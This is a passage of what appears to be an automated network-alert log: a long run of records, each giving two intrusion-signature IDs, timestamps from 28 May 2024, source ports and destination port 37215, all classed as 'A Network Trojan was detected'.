            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001656
            SID:2829579
            Source Port:33712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918286
            SID:2835222
            Source Port:53094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839995
            SID:2835222
            Source Port:44168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706681
            SID:2829579
            Source Port:36568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818832
            SID:2835222
            Source Port:33038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843061
            SID:2829579
            Source Port:51626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979560
            SID:2829579
            Source Port:56122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767486
            SID:2829579
            Source Port:58812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.712021
            SID:2829579
            Source Port:40170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014810
            SID:2835222
            Source Port:49166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681651
            SID:2829579
            Source Port:45992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721197
            SID:2835222
            Source Port:46870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.597407
            SID:2835222
            Source Port:33044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605100
            SID:2829579
            Source Port:46024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069491
            SID:2835222
            Source Port:35710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953550
            SID:2829579
            Source Port:53086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516064
            SID:2829579
            Source Port:46924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.756862
            SID:2835222
            Source Port:54884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446334
            SID:2835222
            Source Port:38522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623290
            SID:2835222
            Source Port:56948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377390
            SID:2829579
            Source Port:56292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864882
            SID:2829579
            Source Port:54660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.711184
            SID:2835222
            Source Port:53256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066870
            SID:2829579
            Source Port:37654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048131
            SID:2835222
            Source Port:59680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.055186
            SID:2829579
            Source Port:38850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303688
            SID:2829579
            Source Port:38476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.340075
            SID:2835222
            Source Port:53412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.613409
            SID:2835222
            Source Port:48656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.048181
            SID:2829579
            Source Port:57248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827883
            SID:2829579
            Source Port:38646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927336
            SID:2835222
            Source Port:50096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921538
            SID:2829579
            Source Port:36540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.910120
            SID:2829579
            Source Port:35788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290121
            SID:2835222
            Source Port:44362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862285
            SID:2829579
            Source Port:58234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.472221
            SID:2829579
            Source Port:42826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818550
            SID:2829579
            Source Port:54152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873536
            SID:2835222
            Source Port:32808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790148
            SID:2835222
            Source Port:48324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882640
            SID:2835222
            Source Port:48148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817611
            SID:2829579
            Source Port:46500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717197
            SID:2829579
            Source Port:37564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251094
            SID:2835222
            Source Port:53734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943706
            SID:2835222
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291024
            SID:2835222
            Source Port:39388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919861
            SID:2829579
            Source Port:34484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811051
            SID:2829579
            Source Port:39406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870298
            SID:2835222
            Source Port:56420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988610
            SID:2829579
            Source Port:33308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905118
            SID:2835222
            Source Port:56948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.409751
            SID:2835222
            Source Port:33834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459556
            SID:2835222
            Source Port:52152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471562
            SID:2835222
            Source Port:58232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912276
            SID:2829579
            Source Port:43686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.916427
            SID:2829579
            Source Port:58388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543210
            SID:2829579
            Source Port:60486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953757
            SID:2829579
            Source Port:56056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943333
            SID:2829579
            Source Port:42808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322778
            SID:2829579
            Source Port:40826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332375
            SID:2829579
            Source Port:59228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849393
            SID:2835222
            Source Port:52126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.657303
            SID:2829579
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769802
            SID:2835222
            Source Port:40100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040485
            SID:2829579
            Source Port:33072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.011325
            SID:2829579
            Source Port:43878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048105
            SID:2829579
            Source Port:54030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648576
            SID:2829579
            Source Port:46268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710083
            SID:2835222
            Source Port:54648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728715
            SID:2829579
            Source Port:44800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392761
            SID:2835222
            Source Port:56432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707626
            SID:2835222
            Source Port:44792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352447
            SID:2835222
            Source Port:44218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894262
            SID:2829579
            Source Port:46254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775682
            SID:2835222
            Source Port:46754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842716
            SID:2835222
            Source Port:36534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470611
            SID:2835222
            Source Port:50886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848772
            SID:2835222
            Source Port:60730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842895
            SID:2835222
            Source Port:45800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860518
            SID:2835222
            Source Port:50978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.072515
            SID:2829579
            Source Port:53424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699730
            SID:2835222
            Source Port:56046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379637
            SID:2829579
            Source Port:48416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.607582
            SID:2829579
            Source Port:49708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861277
            SID:2835222
            Source Port:60426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767304
            SID:2829579
            Source Port:52394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968316
            SID:2835222
            Source Port:49200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773222
            SID:2835222
            Source Port:34086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901536
            SID:2829579
            Source Port:59790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776921
            SID:2829579
            Source Port:48416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030870
            SID:2835222
            Source Port:52096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748691
            SID:2829579
            Source Port:60420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860596
            SID:2835222
            Source Port:34694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432488
            SID:2835222
            Source Port:56746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300026
            SID:2829579
            Source Port:52518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525816
            SID:2829579
            Source Port:45560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940300
            SID:2829579
            Source Port:52618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.848872
            SID:2829579
            Source Port:56190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596971
            SID:2829579
            Source Port:40946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880134
            SID:2835222
            Source Port:42998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789456
            SID:2835222
            Source Port:38494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931585
            SID:2835222
            Source Port:34784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989051
            SID:2835222
            Source Port:53842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721609
            SID:2829579
            Source Port:59790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762034
            SID:2835222
            Source Port:35564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469455
            SID:2829579
            Source Port:54460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.950980
            SID:2829579
            Source Port:59314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002380
            SID:2835222
            Source Port:59370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953097
            SID:2829579
            Source Port:54066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263279
            SID:2829579
            Source Port:39610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.950773
            SID:2829579
            Source Port:41214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778398
            SID:2835222
            Source Port:36706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900653
            SID:2835222
            Source Port:42144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.563769
            SID:2835222
            Source Port:56344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826090
            SID:2835222
            Source Port:58762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760168
            SID:2835222
            Source Port:41246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772427
            SID:2835222
            Source Port:50418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.951579
            SID:2835222
            Source Port:47720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048732
            SID:2829579
            Source Port:42156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864771
            SID:2835222
            Source Port:46536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809824
            SID:2829579
            Source Port:39942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553269
            SID:2829579
            Source Port:46124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605026
            SID:2835222
            Source Port:60176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540184
            SID:2829579
            Source Port:52960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884470
            SID:2829579
            Source Port:50432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927700
            SID:2835222
            Source Port:34538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861899
            SID:2835222
            Source Port:41346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884660
            SID:2835222
            Source Port:33758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515636
            SID:2835222
            Source Port:42994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870230
            SID:2829579
            Source Port:35434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.549750
            SID:2835222
            Source Port:57446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552931
            SID:2829579
            Source Port:46726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739724
            SID:2835222
            Source Port:38370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923917
            SID:2829579
            Source Port:55256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296049
            SID:2835222
            Source Port:60150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910450
            SID:2835222
            Source Port:44120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.768528
            SID:2829579
            Source Port:34010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730951
            SID:2835222
            Source Port:58738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999901
            SID:2829579
            Source Port:56836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431011
            SID:2829579
            Source Port:60676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862968
            SID:2835222
            Source Port:49898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058048
            SID:2829579
            Source Port:52178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851058
            SID:2835222
            Source Port:34400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810267
            SID:2829579
            Source Port:42980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290097
            SID:2829579
            Source Port:49652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857683
            SID:2835222
            Source Port:48582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922399
            SID:2829579
            Source Port:41976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999222
            SID:2829579
            Source Port:45388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926465
            SID:2829579
            Source Port:57378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.910663
            SID:2835222
            Source Port:46476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998202
            SID:2829579
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639913
            SID:2829579
            Source Port:50160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863651
            SID:2835222
            Source Port:40754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.409799
            SID:2835222
            Source Port:49526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.802294
            SID:2835222
            Source Port:54424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849657
            SID:2829579
            Source Port:37146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604939
            SID:2835222
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768004
            SID:2829579
            Source Port:50550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929009
            SID:2835222
            Source Port:55660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.602734
            SID:2835222
            Source Port:44316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893023
            SID:2835222
            Source Port:59404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560965
            SID:2829579
            Source Port:55976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753403
            SID:2829579
            Source Port:43772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084410
            SID:2829579
            Source Port:50736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.874282
            SID:2829579
            Source Port:59228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767183
            SID:2829579
            Source Port:54108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048612
            SID:2829579
            Source Port:41236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713162
            SID:2835222
            Source Port:43462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775494
            SID:2835222
            Source Port:57444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745135
            SID:2835222
            Source Port:33100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815118
            SID:2835222
            Source Port:40230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.950346
            SID:2835222
            Source Port:35078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.725686
            SID:2829579
            Source Port:53078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.740311
            SID:2835222
            Source Port:43218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916926
            SID:2829579
            Source Port:53996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728174
            SID:2829579
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748568
            SID:2835222
            Source Port:49062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010535
            SID:2835222
            Source Port:60952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.725316
            SID:2835222
            Source Port:41184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715459
            SID:2829579
            Source Port:33886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790512
            SID:2835222
            Source Port:45964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707762
            SID:2829579
            Source Port:43252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860473
            SID:2835222
            Source Port:47302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771729
            SID:2835222
            Source Port:55746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506209
            SID:2829579
            Source Port:55112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675862
            SID:2835222
            Source Port:42028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924358
            SID:2835222
            Source Port:34416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432629
            SID:2835222
            Source Port:33536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691621
            SID:2835222
            Source Port:47274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771869
            SID:2829579
            Source Port:38490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559410
            SID:2835222
            Source Port:37506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321201
            SID:2835222
            Source Port:51266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997911
            SID:2829579
            Source Port:40674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.414254
            SID:2835222
            Source Port:44098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864520
            SID:2829579
            Source Port:58104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809995
            SID:2829579
            Source Port:58190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899830
            SID:2835222
            Source Port:35786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
